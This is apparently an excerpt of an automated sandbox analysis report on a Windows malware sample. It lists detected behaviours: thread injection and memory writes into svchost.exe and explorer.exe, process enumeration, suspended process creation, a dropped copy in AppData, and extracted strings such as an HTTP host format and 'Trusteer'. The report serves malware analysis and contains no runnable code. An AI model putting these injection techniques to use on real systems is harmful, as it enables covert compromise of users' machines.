Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Section loaded: NULL target: C:\Windows\System32\svchost.exe protection: readonly	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Thread register set: target process: 7312	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Thread register set: target process: 7552	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Thread register set: target process: 7688	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Thread register set: target process: 7956	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Memory written: C:\Windows\System32\svchost.exe base: BBB7ABD010	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Memory written: C:\Windows\explorer.exe base: 7DA0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Memory written: C:\Windows\System32\svchost.exe base: FE2EE5010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Memory written: C:\Windows\System32\svchost.exe base: 5AE5066010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Memory written: C:\Windows\System32\svchost.exe base: 618E2C2010	Jump to behavior

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,GetProcessTimes,CompareFileTime,CloseHandle,Process32NextW,CloseHandle, explorer.exe	0_2_00007FF6E17057CC
Source: C:\Windows\explorer.exe	Code function: CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,GetProcessTimes,CompareFileTime,CloseHandle,Process32NextW,CloseHandle, explorer.exe	2_2_09CBD9FC
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,GetProcessTimes,CompareFileTime,CloseHandle,Process32NextW,CloseHandle, explorer.exe	3_2_00007FF699AB57CC
Source: C:\Windows\System32\svchost.exe	Code function: CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,GetProcessTimes,CompareFileTime,CloseHandle,Process32NextW,CloseHandle, explorer.exe	4_2_00007FF7536F57CC
Source: C:\Windows\System32\svchost.exe	Code function: CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,GetProcessTimes,CompareFileTime,CloseHandle,Process32NextW,CloseHandle, explorer.exe	7_2_00007FF736B557CC
Source: C:\Windows\System32\svchost.exe	Code function: CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,GetProcessTimes,CompareFileTime,CloseHandle,Process32NextW,CloseHandle, explorer.exe	13_2_00007FF7F4E757CC

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Process created: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM	Jump to behavior

Source: explorer.exe, explorer.exe, 00000002.00000002.2973724478.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2965350548.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1740843885.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000002.2965350548.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1737945978.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.1737733068.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2964470757.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000002.00000002.2965350548.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1737945978.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000003.2043651577.000000000CB8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2979697465.000000000C350000.00000020.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2983380179.000000000FC00000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: Host: http(s)://%s\|%s\|%s\|%d\|info\|%d\|%d\|%d\|%d\|%s\|%s\|%d\|%dMozilla\\.\pipe\%sopenShell_TrayWndverclsid.exe3264child.dllTrusteerABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/>?>>?456789:;<=
Source: explorer.exe, 00000002.00000002.2965350548.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1737945978.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

Code function: 0_2_00007FF6E170FC38 cpuid

0_2_00007FF6E170FC38

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: GetLocaleInfoEx,	0_2_00007FF6E171972C
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,	0_2_00007FF6E1719678
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,	0_2_00007FF6E170BEB4
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,GetLocaleInfoEx,_invoke_watson,	0_2_00007FF6E171920C
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_00007FF6E171AE34
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,WideCharToMultiByte,	0_2_00007FF6E171ACD8
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,	0_2_00007FF6E1717D2C
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,GetLocaleInfoEx,_invoke_watson,	0_2_00007FF6E171406C
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,	0_2_00007FF6E17184B4
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: EnumSystemLocalesEx,	0_2_00007FF6E1716430
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,wcschr,wcschr,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,_invoke_watson,_invoke_watson,	0_2_00007FF6E1719830
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,	0_2_00007FF6E17177A0
Source: C:\Windows\explorer.exe	Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,	2_2_0C3796FC
Source: C:\Windows\explorer.exe	Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,	2_2_0C378F74
Source: C:\Windows\explorer.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	2_2_0C37817C
Source: C:\Windows\explorer.exe	Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free,	2_2_0C3789E8
Source: C:\Windows\explorer.exe	Code function: __crtGetLocaleInfoA,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,_calloc_crt,free,	2_2_0C36FA50
Source: C:\Windows\explorer.exe	Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,	2_2_0C36E30C
Source: C:\Windows\explorer.exe	Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,	2_2_0FC1EF0C
Source: C:\Windows\explorer.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	2_2_0FC28D7C
Source: C:\Windows\explorer.exe	Code function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,	2_2_0FC28C20
Source: C:\Windows\explorer.exe	Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,	2_2_0FC29B74
Source: C:\Windows\explorer.exe	Code function: _getptd,__lc_wcstolc,__get_qualified_locale,__lc_lctowcs,GetLocaleInfoEx,GetACP,	2_2_0FC24784
Source: C:\Windows\explorer.exe	Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,	2_2_0FC2B6B4
Source: C:\Windows\explorer.exe	Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,	2_2_0FC20650
Source: C:\Windows\explorer.exe	Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free,	2_2_0FC295E8
Source: C:\Windows\explorer.exe	Code function: GetLocaleInfoEx,	2_2_0FC2B5B0
Source: C:\Windows\explorer.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,	2_2_0FC2B4FC
Source: C:\Windows\explorer.exe	Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,	2_2_0FC2A2FC
Source: C:\Windows\explorer.exe	Code function: GetLocaleInfoEx,	2_2_0FC321D8
Source: C:\Windows\explorer.exe	Code function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_getptd,GetLocaleInfoEx,	2_2_0FC2B090
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: GetLocaleInfoEx,	3_2_00007FF699AC972C
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,	3_2_00007FF699ABBEB4
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,	3_2_00007FF699AC9678
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	3_2_00007FF699ACAE34
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,GetLocaleInfoEx,_invoke_watson,	3_2_00007FF699AC920C
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,WideCharToMultiByte,	3_2_00007FF699ACACD8
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,	3_2_00007FF699AC7D2C
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,GetLocaleInfoEx,_invoke_watson,	3_2_00007FF699AC406C
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,	3_2_00007FF699AC84B4
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: EnumSystemLocalesEx,	3_2_00007FF699AC6430
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,wcschr,wcschr,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,_invoke_watson,_invoke_watson,	3_2_00007FF699AC9830
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,	3_2_00007FF699AC77A0
Source: C:\Windows\System32\svchost.exe	Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,	4_2_00007FF7537084B4
Source: C:\Windows\System32\svchost.exe	Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,GetLocaleInfoEx,_invoke_watson,	4_2_00007FF75370406C
Source: C:\Windows\System32\svchost.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,WideCharToMultiByte,	4_2_00007FF75370ACD8
Source: C:\Windows\System32\svchost.exe	Code function: EnumSystemLocalesEx,	4_2_00007FF753706430
Source: C:\Windows\System32\svchost.exe	Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,wcschr,wcschr,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,_invoke_watson,_invoke_watson,	4_2_00007FF753709830
Source: C:\Windows\System32\svchost.exe	Code function: GetLocaleInfoEx,	4_2_00007FF75370972C
Source: C:\Windows\System32\svchost.exe	Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,	4_2_00007FF7537077A0
Source: C:\Windows\System32\svchost.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	4_2_00007FF75370AE34
Source: C:\Windows\System32\svchost.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,	4_2_00007FF753709678
Source: C:\Windows\System32\svchost.exe	Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,	4_2_00007FF7536FBEB4
Source: C:\Windows\System32\svchost.exe	Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,	4_2_00007FF753707D2C
Source: C:\Windows\System32\svchost.exe	Code function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,GetLocaleInfoEx,_invoke_watson,	4_2_00007FF75370920C
Source: C:\Windows\System32\svchost.exe	Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,	7_2_00007FF736B677A0
Source: C:\Windows\System32\svchost.exe	Code function: GetLocaleInfoEx,	7_2_00007FF736B6972C
Source: C:\Windows\System32\svchost.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,WideCharToMultiByte,	7_2_00007FF736B6ACD8
